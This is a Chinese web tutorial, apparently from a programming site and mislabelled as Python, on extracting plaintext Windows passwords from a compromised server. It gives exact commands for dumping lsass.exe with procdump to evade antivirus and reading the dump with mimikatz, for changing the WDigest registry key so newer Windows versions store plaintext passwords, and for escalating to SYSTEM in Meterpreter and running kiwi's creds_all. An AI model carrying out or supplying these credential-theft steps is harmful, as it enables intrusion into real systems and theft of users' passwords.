脚本之家 服务器常用软件
快捷导航
您的位置:首页脚本专栏python → python获取windows明文密码

python简单直接获取windows明文密码操作技巧

 更新时间:2021年10月14日 16:21:46   作者:Bypass--  
在实战中,拿到一台Windows服务器权限,如果可以直接获取Windows明文密码的话,就可以更容易深入挖掘。本文分享几个获取Windows明文密码的技巧,简单直接且有效

01、Procdump+Mimikatz

利用procdump+Mimikatz 绕过杀软获取Windows明文密码。

(1)工具准备:

ProcDump:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

mimikatz:

https://github.com/gentilkiwi/mimikatz/

(2)Windows Server 2008 R2提取明文密码

在目标机器上生成存储文件:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

28ff828ad9dc41f836b56f21c0539199.png

将lsass.dmp复制到本地,使用mimikatz 一行命令将结果输出到文本。

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"> pssword.txt

如图:成功从内存中提取明文密码。

313f61ce69afdb6dd81d5799061cc2b3.png

02、Window 2012 R2抓取密码

在Windows2012系统及以上的系统,默认在内存缓存中禁止保存明文密码的。攻击者可以通过修改注册表的方式抓取明文,需要用户重新登录后才能成功抓取。

(1)修改注册表

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

(2)用户administrator注销后重新登录,成功抓取到明文信息。

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt

6bf5bf93d637794f12177436ca146737.png

03、MSF kiwi模块

使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。

提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。

meterpreter > getuid
Server username: BYPASS-E97BA3FC\Administrator
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

加载kiwi模块:

load kiwi

列举系统中的明文密码:

creds_all

cdc6292a7aaba1f4ba86e7b526fe55ae.png

以上就是python简单直接获取windows明文密码操作技巧的详细内容,更多关于python获取windows明文密码的资料请关注脚本之家其它相关文章!

您可能感兴趣的文章:

相关文章

  • Python猜解网站数据库管理员密码的脚本

    Python猜解网站数据库管理员密码的脚本

    这篇文章主要和大家分享一个Python脚本,可以实现猜解网站数据库管理员的密码。文中的示例代码讲解详细,需要的小伙伴可以参考一下
    2022-02-02
  • 解决python爬虫中有中文的url问题

    解决python爬虫中有中文的url问题

    今天小编就为大家分享一篇解决python爬虫中有中文的url问题,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
    2018-05-05
  • Python人脸识别第三方库face_recognition接口说明文档

    Python人脸识别第三方库face_recognition接口说明文档

    Python人脸识别第三方库face_recognition接口简单说明,及简单使用方法
    2019-05-05
  • Python使用ChainMap实现组合数据魔法实例探究

    Python使用ChainMap实现组合数据魔法实例探究

    这篇文章主要为大家介绍了Python使用ChainMap实现组合数据魔法实例探究,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪
    2024-01-01
  • Python实现对adb命令封装

    Python实现对adb命令封装

    这篇文章主要介绍了Python实现对adb命令封装,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
    2020-03-03
  • 圣诞节教你用Python绘制爱心圣诞树

    圣诞节教你用Python绘制爱心圣诞树

    圣诞节快要到了,心血来潮,写段代码给大家介绍下基于Python绘制爱心圣诞树的方法,代码简单易懂,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友参考下吧
    2021-12-12
  • Python Fuzzywuzzy库基本函数及模糊字符串匹配应用实战

    Python Fuzzywuzzy库基本函数及模糊字符串匹配应用实战

    fuzzywuzzy 是一个用于模糊字符串匹配的 Python 库,它基于编辑距离算法,提供了多个函数来比较字符串之间的相似性,在实际开发中,字符串匹配是一项常见但具有挑战性的任务,用户可能犯拼写错误,使用缩写或者输入同义词,因此,我们需要一种方法来处理这些情况
    2023-12-12
  • Python文件时间操作步骤代码详解

    Python文件时间操作步骤代码详解

    这篇文章主要介绍了Python文件时间操作步骤代码详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
    2020-04-04
  • pygame学习笔记(6):完成一个简单的游戏

    pygame学习笔记(6):完成一个简单的游戏

    这篇文章主要介绍了pygame学习笔记(6):完成一个简单的游戏,本文综合了学习过的知识,完成一个简单的游戏开发,是本系列文章的最后一篇,需要的朋友可以参考下
    2015-04-04
  • python小练习题之条件语句if

    python小练习题之条件语句if

    这篇文章主要介绍了python小练习题之条件语句if的相关资料,文中介绍了年龄判断、身高判断、数字奇偶性判断、闰年判断、水仙花数判断、成绩等级判断以及三角形判断等常见场景,需要的朋友可以参考下
    2024-12-12

最新评论